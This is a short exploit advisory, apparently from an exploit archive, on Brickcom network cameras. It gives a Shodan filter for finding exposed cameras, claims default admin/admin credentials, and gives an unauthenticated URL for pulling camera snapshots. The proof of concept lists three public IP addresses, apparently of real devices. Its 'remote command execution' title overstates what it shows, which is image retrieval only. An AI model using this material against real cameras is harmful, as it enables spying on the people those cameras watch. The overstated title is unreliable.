# Exploit Title: Exploit Title: Brickcom Camera - Remote command execution
# Date: 2/26/2026
# Google Dork : In Shodan search engine, the filter is --> realm="Brickcom"
# Exploit Author: parsa rezaie khiabanloo
# Tested on: Windows/Linux/Android
# 1. Description:
All Brickcom versions username and password are admin and they have RCE snapshot without authentication.
Exploit : /ONVIF/media.cgi?action=getSnapshot&channel=1
Exploit : ONVIF/media.cgi?action=getSnapshot
# 2 . Proof of Concept:
Retrieve a camera snapshot without authentication:
http://2.81.165.52:5000/ONVIF/media.cgi?action=getSnapshot&channel=1
http://109.89.253.56:10001/ONVIF/media.cgi?action=getSnapshot
http://80.123.193.122:10101/ONVIF/media.cgi?action=getSnapshot